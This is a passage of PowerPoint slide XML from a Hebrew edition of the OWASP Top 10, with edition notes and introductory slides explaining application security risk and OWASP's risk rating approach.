                        </a:rPr>
                        <a:t>[חדש, התווסף ע"י </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>                        הקהילה]</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="180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rgbClr val="83276B">
                        <a:alpha val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    הערות בנוגע למהדורה זו</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2688431" y="7439819"/>
            <a:ext cx="858839" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117852" y="7010400"/>
            <a:ext cx="615948" cy="394295"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 515"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="stealth"/>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8" name="Table 22"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216593196"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3962400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>מה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> הם סיכוני האבטחה בפיתוח קוד?</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3626122">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="95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תוקפים עלולים להשתמש בדרכים שונות דרך היישום כדי להזיק לעסק שלך או לארגון. כל אחת מדרכים אלו מייצגת סיכון שעשוי לעיתים להיות רציני מספיק כדי להצדיק תשומת לב מיוחדת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="95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p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="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לעיתים, דרכי אלו קלות למציאה וניצול ולעיתים הן קשות ביותר למציאה. באופן דומה, הנזק עשוי להיות ללא השלכות, או שעשוי לגרום לנזק ממשי לעסק. על-מנת לקבוע את הנזק לארגון שלך, תוכל לבחון את הסבירות הקשורה לכל גורם איום, נתיב תקיפה וחולשה ולאחד אותם בעזרת ההשפעה הטכנית והעסקית על הארגון שלך. יחדיו, אלו הגורמים להערכת הנזק הכולל.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    סיכונים בפיתוח מאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98152532"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="4183200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הסיכון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שלי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3847575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מסמך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מתמקד בזיהוי הסיכונים החמורים ביותר בפיתוחי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> עבור מגוון רחב של ארגונים. לכל אחד מהסיכונים הנ"ל, אנו מספקים מידע כללי לגבי הסבירות וההשפעה הטכנית של סיכונים אלה באמצעות שימוש בטבלת הערכת הסיכונים הבאה, המתבססת על </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>מתודולוגיית הערכת הסיכונים של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
